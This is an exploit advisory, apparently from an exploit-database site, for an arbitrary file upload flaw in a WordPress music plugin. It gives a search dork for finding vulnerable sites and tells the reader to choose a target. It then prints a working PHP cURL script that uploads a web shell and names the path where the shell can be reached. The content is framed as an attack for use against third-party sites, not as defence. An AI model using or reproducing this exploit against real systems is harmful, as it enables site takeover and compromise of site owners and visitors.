WP-Plugins Peugeot Music Plugin Arbitrary File Upload

2018.05.23
id Mr.7z (ID) id
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:/wp-content/plugins/peugeot-music-plugin/

Exploit Title : WP-Plugins Peugeot Music Plugin Arbitrary File Upload Author : Mr.7z Vendor Homepage : - Vendor Github : - Date : 23 May 2018 Tested on : Windows 10 (Home Edition) • Search Dork On Google • Choose Target • Exploit: /wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php • Vuln? {"jsonrpc" : "2.0", "result" : null, "id" : "id"} • CSRF <?php $url = "http://target.com /wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"; // put URL Here $post = array ( "file" => "@yourshell.jpg", "name" => "yourshell.php" ); $ch = curl_init ("$url"); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt ($ch, CURLOPT_POST, 1); @curl_setopt ($ch, CURLOPT_POSTFIELDS, $post); $data = curl_exec ($ch); curl_close ($ch); echo $data; ?> For CSRF using php xampp. • Shell Locate: /wp-content/plugins/peugeot-music-plugin/js/plupload/examples/uploads/yourshell.php -Thanks To XaiSyndicate - Family Attack Cyber - HunterSec-Team - Typical Idiot Security [!]


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top